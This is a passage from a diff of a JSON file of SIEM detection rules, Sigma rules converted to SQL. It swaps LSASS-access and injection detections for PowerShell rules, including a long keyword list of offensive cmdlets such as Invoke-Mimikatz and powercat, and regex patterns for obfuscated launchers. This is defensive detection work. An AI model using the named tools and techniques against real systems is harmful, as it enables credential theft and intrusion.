LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.003", + "attack.t1027", "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.t1003.003" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 